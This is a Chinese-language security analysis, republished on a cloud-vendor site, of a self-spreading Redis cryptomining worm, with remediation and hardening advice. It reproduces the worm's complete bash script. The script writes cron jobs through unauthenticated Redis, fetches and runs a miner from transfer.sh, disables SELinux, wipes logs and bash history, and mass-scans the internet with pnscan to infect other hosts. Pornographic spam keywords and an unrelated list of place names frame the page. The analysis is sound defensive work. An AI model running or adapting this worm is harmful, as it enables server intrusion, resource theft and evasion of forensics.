亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Linux Redis自動化挖礦感染蠕蟲實例分析

發布時間:2022-01-17 09:23:31 來源:億速云 閱讀:125 作者:iii 欄目:網絡安全

本文小編為大家詳細介紹“Linux Redis自動化挖礦感染蠕蟲實例分析”,內容詳細,步驟清晰,細節處理妥當,希望這篇“Linux Redis自動化挖礦感染蠕蟲實例分析”文章能幫助大家解決疑惑,下面跟著小編的思路慢慢深入,一起來學習新知識吧。

  一、 背景

  自從Redis未授權問題獲取Linux系統root權限的攻擊方法的披露后,由于其易用性,利用該問題入侵Linux服務進行挖礦、掃描等的黑客行為一直層出不窮;而在眾多利用該問題入侵服務器進行黑產行為的案例中,其中就存在一類利用該問題進行挖礦并且會利用pnscan自動掃描感染其他機器;該類攻擊一直存在,不過在近期又呈現數量增加的趨勢,在最近捕獲到多次,我們針對其做下具體的分析。

  二、 漏洞說明

  首先針對利用的漏洞做個說明,Redis 默認情況下,會綁定在 0.0.0.0:6379,在沒有利用防火墻進行屏蔽的情況下,將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。攻擊者在未授權訪問Redis的情況下利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的 ~/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器;如果Redis服務是以root權限啟動,可以利用該問題直接獲得服務器root權限。

  經過在ZoomEye和SHODAN檢索,可以發現分別眾多Redis服務開放在公網上,這些服務都可能成為攻擊目標。

Linux Redis自動化挖礦感染蠕蟲實例分析

Linux Redis自動化挖礦感染蠕蟲實例分析

  三、 入侵分析

Linux Redis自動化挖礦感染蠕蟲實例分析

  經過對捕獲的事件進行分析,我們發現整個入侵流程大概是包含以下幾個環節:1、掃描開放6379端口的Linux服務器(后續感染掃描網段為1.0.0.0/16到224.255.0.0/16)

  2、通過redis-cli嘗試連接Redis并執行預置在.dat文件里的利用命令將Redis的數據文件修改為/var/spool/cron/root,然后通過在Redis中插入數據,將下載執行腳本的動作寫入crontab任務

  3、通過腳本實現以上的相關行為,完成植入并啟動挖礦程序

  4、再編譯安裝pnscan,繼續掃描感染下一個目標

  四、 腳本分析

  整個入侵利用以及后續的感染的實現,最主要的功能都是基于通過Redis問題寫入crontab任務中下載執行的NaNd腳本(https://transfer.sh/MIpIA/tmp.9kIguIhkI7)來實現的,通過對它的分析,我們基本能夠得到整個流程的所有細節,這是一個base腳本,我們通過解讀來分析下它的相關功能。

  1. sleep 1

  2. find . -maxdepth 1 -name “.mxff0” -type f -mmin +60 -delete

  3. [ -f .mxff0 ] && exit 0

  4. echo 0 > .mxff0

  這部分代碼只要是用作重復執行的判斷,將.mxff0文件作為標記文件,如果存在該文件則代表機器上已執行腳本,直接退出,否則寫.mxff0文件并進行下一步動作;

  5. trap “rm -rf .m* NaNd tmp.* .r .dat $0” EXIT

  設置預置動作,在腳本退出后刪除相關文件和腳本自身;

  6. setenforce 0 2>/dev/null

  7. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

  8. crontab -r 2>/dev/null

  9. rm -rf /var/spool/cron 2>/dev/null

  10. grep -q 8.8.8.8 /etc/resolv.conf || echo “nameserver 8.8.8.8” >> /etc/resolv.conf

  11. rm -rf /tmp/* 2>/dev/null

  12. rm -rf /var/tmp/* 2>/dev/null

  13. rm -rf /etc/root.sh 2>/dev/null

  14. sync && echo 3 > /proc/sys/vm/drop_caches

  15. cat <<EOF> /etc/security/limits.conf

  16. * hard nofile 100000

  17. * soft nofile 100000

  18. root hard nofile 100000

  19. root soft nofile 100000

  20. * hard nproc 100000

  21. * soft nproc 100000

  22. root hard nproc 100000

  23. root soft nproc 100000

  24. EOF

  這部分主要是修改系統的配置,6、7行為關閉SELINU;

  然后清空/var/spool/cron,進而判斷系統DNS服務器是否存在8.8.8.8,沒有則添加;

  11-13則清空系統tmp目錄和刪除相關文件;

  14行清空系統緩存,而15-24則是修改系統的資源限制;

  25. iptables -I INPUT 1 -p tcp –dport 6379 -j DROP

  26. iptables -I INPUT 1 -p tcp –dport 6379 -s 127.0.0.1 -j ACCEPT

  27. ps xf | grep -v grep | grep “redis-server|nicehash|linuxs|linuxl|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|.sshd|/tmp/init” | while read pid _; do kill -9 “$pid”; done

  這里再進一步的增加iptables限制6379端口只允許本地訪問,同時kill相關包含挖礦、redis客戶端、爬蟲等進程,這里的目的也比較簡單,避免被其他黑客再次入侵,同時清除可能其他黑客入侵啟動的進程;

  28. rm -rf /tmp/* 2>/dev/null

  29. rm -rf /var/tmp/* 2>/dev/null

  30. echo 0 > /var/spool/mail/root

  31. echo 0 > /var/log/wtmp

  32. echo 0 > /var/log/secure

  33. echo 0 > /root/.bash_history

  清除相關登錄日志、命令操作歷史;

  34. YUM_PACKAGE_NAME=”iptables gcc redis coreutils bash curl wget”

  35. DEB_PACKAGE_NAME=”coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl”

  36. if cat /etc/*release | grep -i CentOS; then

  37. yum clean all

  38. yum install -y -q epel-release

  39. yum install -y -q $YUM_PACKAGE_NAME

  40. elif cat /etc/*release | grep -qi Red; then

  41. yum clean all

  42. yum install -y -q epel-release

  43. yum install -y -q $YUM_PACKAGE_NAME

  44. elif cat /etc/*release | grep -qi Fedora; then

  45. yum clean all

  46. yum install -y -q epel-release

  47. yum install -y -q $YUM_PACKAGE_NAME

  48. elif cat /etc/*release | grep -qi Ubuntu; then

  49. export DEBIAN_FRONTEND=noninteractive

  50. rm -rf /var/lib/apt/lists/*

  51. apt-get update -q –fix-missing

  52. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  53. elif cat /etc/*release | grep -qi Debian; then

  54. export DEBIAN_FRONTEND=noninteractive

  55. rm -rf /var/lib/apt/lists/*

  56. apt-get update –fix-missing

  57. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  58. elif cat /etc/*release | grep -qi Mint; then

  59. export DEBIAN_FRONTEND=noninteractive

  60. rm -rf /var/lib/apt/lists/*

  61. apt-get update –fix-missing

  62. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  63. elif cat /etc/*release | grep -qi Knoppix; then

  64. export DEBIAN_FRONTEND=noninteractive

  65. rm -rf /var/lib/apt/lists/*

  66. apt-get update –fix-missing

  67. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  68. else

  69. exit 1

  70. fi

  71. sleep 1

  72. if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then

  73. curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

  74. sleep 1

  75. [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112

  76. fi

  這一長串的內容主要目的是下載并編譯安裝pnscan,從內容中我們可以看到對于不同操作系統的判斷然后安裝依賴的相關模塊,然后才是從github下載pnscan的源碼進行編譯安裝;至于為什么采用編譯安裝的形式,猜測是出于兼容不同系統以及每次編譯生成的pnscan的MD5都不一樣,避免形成固定特征;

  77. tname=$( mktemp )

  78. OMURL=https://transfer.sh/MIpIA/tmp.vOYTgmtZge

  79. curl -s $OMURL > $tname || wget -q -O $tname $OMURL

  80. NMURL=$( curl -s –upload-file $tname https://transfer.sh )

  81. mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

  這部分主要是下載挖礦程序并重命名為.gpg,增加執行權限,執行后刪除,同時重新上傳到https://transfer.sh/ 獲取新的鏈接;

  82. [ -z “$NMURL” ] && NMURL=$OMURL

  83. ncmd=$(basename $(mktemp))

  84. sed ‘s|'”$OMURL”‘|'”$NMURL”‘|g’ < NaNd > $ncmd

  85. NSURL=$( curl -s –upload-file $ncmd https://transfer.sh )

  86. echo ‘flushall’ > .dat

  87. echo ‘config set dir /var/spool/cron’ >> .dat

  88. echo ‘config set dbfilename root’ >> .dat

  89. echo ‘set Backup1 “tn*/2 * * * * curl -s ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

  90. echo ‘set Backup2 “tn*/5 * * * * wget -O NaNd ‘${NSURL}’ && bash NaNdnt”‘ >> .dat

  91. echo ‘set Backup3 “tn*/10 * * * * lynx -source ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

  92. echo ‘save’ >> .dat

  93. echo ‘config set dir /var/spool/cron/crontabs’ >> .dat

  94. echo ‘save’ >> .dat

  95. echo ‘exit’ >> .dat

  而這部分內容主要是生成新的.dat文件,包含將原來NaNd腳本里的里挖礦程序的下載地址替換為上一步上傳到https://transfer.sh/ 得到的新地址,還有Redis利用的相關語句;

  96. pnx=pnscan

  97. [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan

  98. [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan

  99. for x in $( seq 1 224 | sort -R ); do

  100. for y in $( seq 0 255 | sort -R ); do

  101. $pnx -t512 -R ‘6f 73 3a 4c 69 6e 75 78’ -W ‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’ $x.$y.0.0/16 6379 > .r.$x.$y.o

  102. awk ‘/Linux/ {print $1, $3}’ .r.$x.$y.o > .r.$x.$y.l

  103. while read -r h p; do

  104. cat .dat | redis-cli -h $h -p $p –raw &

  105. done < .r.$x.$y.l

  106. done

  107. done

  而步主要是調用pnscan去掃描子網段1.0.0.0/16到224.255.0.0/16中開放6379端口并且操作系統為Linux的目標,然后利用redis-cli執行.dat中的命令,進行下個目標的感染;這里pnscan的-W參數值‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’轉換后內容‘*1rn$4rnINFOrn’,是向目標Redis服務發送請求獲取Redis服務器的各種信息和統計數值,再通過-R參數值‘6f 73 3a 4c 69 6e 75 78′(轉換后內容為os:Linux)判斷是否Linux系統。

  108. echo 0 > /var/spool/mail/root 2>/dev/null

  109. echo 0 > /var/log/wtmp 2>/dev/null

  110. echo 0 > /var/log/secure 2>/dev/null

  111. echo 0 > /root/.bash_history 2>/dev/null

  112. exit 0

  最后就是收尾工作,清除相關日志和命令執行歷史,同時在腳本退出的時候會觸發腳本一開始用trap預置的動作,會做刪除操作,刪除相關文件和腳本自身(rm -rf m* NaNd tmp.* .r .dat $0)。

  通過對腳本的解讀,我們基本已經清楚整個蠕蟲的行為和入侵流程,也就是我們開始所描述的流程。

  另外,通過閱讀腳本,我們發現雖然整個入侵流程并不是多復雜,但腳本其實有很多”工程化”的細節考慮,不得不讓人驚嘆入侵者的”考慮周到”:

  1、 利用.mxff0文件做重復執行檢驗,避免腳本的重復執行

  2、 為了增加成功性,一些環境的預處理:

  a) 關閉SELINUX

  b) 增加8.8.8.8的DNS

  c) 清空tmp目錄

  d) 清空系統緩存

  e) 修改系統資源限制

  3、 痕跡清除

  a) 利用trap預置動作好在腳本執行完成后刪除相關文件和腳本自身

  b) 重復清除相關登錄等日志和命令執行歷史

  4、 同行預防

  a) 利用iptables避免Redis服務開放在公網上從而導致再次被入侵

  b) 清除同行可能遺留的入侵行為,kill相關進程

  5、 系統兼容性

  a) 判斷操作系統,針對性的執行相關命令,安裝依賴包,最大限度的提高pnscan編譯安裝的成功率

  b) 關閉SELINUX,通過setenforce和修改/etc/sysconfig/selinux兩種手段實現

  c) 寫入Crontab里的下載并執行腳本的任務,通過curl、wget、lynx三種方式實現

  d) Pnscan掃描增加操作系統判斷,減少沒有必要的感染嘗試

  6、 特征去除,存活延續

  a) Pnscan采用安裝編譯的方式,既提高在不同系統下的兼容性,也避免形成固定的MD5特征

  b) 利用https://transfer.sh 中轉,每一次感染均生成新的連接,避免固定鏈接形成固定特征

  c) 下載到系統的相關文件均采用隨機生成的文件名

  正是由于入侵者種種的”考慮周到”使得他的入侵感染的成功率能夠達到的一定的層度。

  五、 安全建議

  病毒清理和系統恢復

  我們主要參考腳本的相關行為進行對應的行為恢復和刪除即可:

  1、 關閉SELINUX,根據系統原環境和業務需要重新開啟SELINUX

  2、 清空了/var/spool/cron,根據原先備份清空恢復

  3、 修改/etc/resolv.conf增加DNS服務8.8.8.8,如無影響可不處理,或者刪除

  4、 修改了系統資源限制(/etc/security/limits.conf),可根據備份情況恢復

  5、 增加了對6379端口的Iptables規則,如果不影響業務,建議保留

  6、 Kill了相關進程,檢查是否包含業務所需進程,根據情況恢復

  7、 安裝了相關包,具體列表見上文,可根據情況刪除或者如無影響可保留

  8、 編譯安裝了pnscan,可刪除/usr/local/bin/pnscan

  9、 清除了相關日志和tmp目錄,對系統無影響,可忽略

  10、 啟動了挖礦進程和pnscan掃描感染,進程:.gpg、pnscan,直接kill

  還包含了一些中間文件,雖然腳本包含相關刪除操作,但建議還是全局查找確認:.mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

  Redis服務加固

  1、 如無必要,修改bind項,不要將Redis綁定在0.0.0.0上,避免Redis服務開放在外網,可以通過iptables或者騰訊云用戶可以通過安全組限制訪問來源

  2、 在不影響業務的情況,不要以root啟動Redis服務,同時建議修改默認的6379端口,大部分針對Redis未授權問題的入侵都是針對默認端口進行的

  3、 配置AUTH,增加密碼校驗,這樣即使開放在公網上,如果非弱口令的情況,黑客也無法訪問Redis服務進行相關操作

  4、 使用rename-command CONFIG “RENAME_CONFIG”重命名相關命令,這樣黑客即使在連接上未授權問題的Redis服務,在不知道命令的情況下只能獲取相關數據,而無法進一步利用

讀到這里,這篇“Linux Redis自動化挖礦感染蠕蟲實例分析”文章已經介紹完畢,想要掌握這篇文章的知識點還需要大家自己動手實踐使用過才能領會,如果想了解更多相關內容的文章,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

宜良县| 武鸣县| 九台市| 绥德县| 哈尔滨市| 沙田区| 永济市| 清丰县| 惠东县| 郑州市| 葫芦岛市| 奉贤区| 通河县| 和硕县| 恩平市| 铁岭县| 通化县| 城口县| 霍州市| 理塘县| 鄂温| 潜江市| 阿鲁科尔沁旗| 江达县| 阳泉市| 天台县| 阆中市| 杨浦区| 莆田市| 垦利县| 都江堰市| 酒泉市| 沧源| 渭南市| 绵阳市| 古浪县| 秦安县| 波密县| 大足县| 枣阳市| 炎陵县|